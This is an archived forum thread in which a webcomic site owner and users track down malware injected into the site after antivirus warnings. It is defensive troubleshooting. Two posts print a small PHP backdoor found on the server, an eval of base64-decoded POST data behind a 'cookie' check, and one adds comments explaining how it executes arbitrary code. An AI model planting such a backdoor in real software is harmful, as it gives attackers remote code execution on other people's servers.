Help - Search - Members - Calendar
Full Version: Ongoing fight against hackers
The Other Side forums - suitable for mature readers! > The Other Side forums > Daily life
Mata
In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!
Moosh
AVG popped these up when Firefox tried to load the RSS feed from your blog.
Mata
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!
Mata
I've had a try at fixing that. Could you see if it's worked please?
snooodlysnoosnoosnoodle
AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!
Mata
I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.
Daria
After realising that there's no where online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.
Moosh
QUOTE (Mata @ Apr 20 2011, 09:14 AM) *
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.
Mata
Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)
Moosh
Speak of the devil, different day, different computer and I get:
Mata
Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)
CrazyFooIAintGettinOnNoPlane
QUOTE (Mata @ Apr 21 2011, 03:57 PM) *
Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be its to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}
Mata
We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?
Mata
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.
SPEAKERfortheLOST
If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.
Daria
I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!
Mata
I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done biggrin.gif It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.
Hobbes
QUOTE (Mata @ Apr 23 2011, 09:25 PM) *
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?
Mata
Possibly, but hopefully I've fixed it!
Mata
I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!
Pixelgoth
Got a blocked threat message but don't know how to paste it here sad.gif
Mata
Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).
Mata
I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.
Moosh
Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...
Mata
Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?
Moosh
This happened a couple of minutes ago, so about 10:05pm on 30/04/11. Got the same alerts as before, complaining about www.matazone.co.uk/blog/?feed=rss2 I clicked on the show details button but it just popped up a box saying that the process that generated the alert was firefox.

Mata
Cool, thanks.

Have you had anything while looking at my comic? If no then that suggests that the issue there could be fixed. Potentially it also means that the problem on my blog could be fixed by overwriting more of the files (the way I fixed the comic) but I don't know which files to overwrite.

I would really love to actually find the code causing the problem, rather than just overwrite it, because if I find it then it would make it much easier to find in the future (or even better, it could make it preventable).

The blog and the comic are updated to the latest versions often within hours of a new release, so they shouldn't be causing issues. It's concerning that they got infected. I'm thinking that maybe there is something lurking in the templates, because they wouldn't get overwritten with the automatic software updates... Then again, if it's the RSS code triggering it, then I've got no idea how it's getting through. sad.gif

I'll keep looking. Thanks for the information!
Mata
Well, there was a link to a javascript file hosted by Amazon on the blog pages that I never got working properly. I've disabled that, but that's all I can see that I didn't know about. It's possible that someone had hijacked the Amazon script somehow... Maybe?

Let me know if it's still happening please.
Mata
I've scanned my blog and site several dozen times today and it's come up clean. Any new blips anyone?
Mata
Ah ha! I've not found it yet, but I think I've got a clue. There are base set-up files for websites, like php.ini, and I think that a randomisation script could have been added into there that occasionally triggers the malicious code. The code doesn't exist on any of my sites, instead it exists on a higher server level. I'm getting my hosts to investigate this possibility now, but I really think that this is the right direction.

I'll let you know if I get any further. Thank you for your patience and support.
Moosh
I haven't seen an alert for a while. It appears you've got it.
Mata
Thanks, but I'm actually not convinced. I don't have access to the configuration files that I suspect have been altered. I've got my hosting company investigating those, but they've been very quiet on that front. I hope they've got it completely, but it's more likely they've just disabled the main bit of it otherwise they probably would have told me that it's fixed.

A whole directory of dodgy files was installed on my server last night. I caught it as soon as it happened and we are now investigating to see if we can work out how they were placed there.

The war isn't over yet, but I definitely think that we're going in the right direction.
Mata
Okay, so a deep scan of the site files found a couple more bits skulking around in the cgi-bin (I don't think they really did anything, but it was good to clear them out), otherwise my server shoudl to spotless.

Let me know if you have anything weird pop up. Also, please let me know if you have had trojan reports of the last month and you don't any more. I need to work out if I've caught everything and crowd sourcing is currently the best method I've got. Thanks!
Mata
Can anyone confirm that things have been clear over the last couple of weeks please?
Hobbes
I haven't come across any warnings here for some time but this was the case even when a lot of others were getting warnings coming up. But, from here, everything seems to have been okay the last couple of weeks.
Mata
Awesome. I'm glad we finally got there. It was a real pain in the bottom trying to get everything. I've got a lot more security on my sites now and I've got monitor systems in place that will let me know if anything is altered without my permission. We should be safe for the time being smile.gif

Even so, I'd like to get this forum updated to more recent software at some point. This isn't the latest version and it would be good to get up to date, so you may see some changes at some point in the future.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.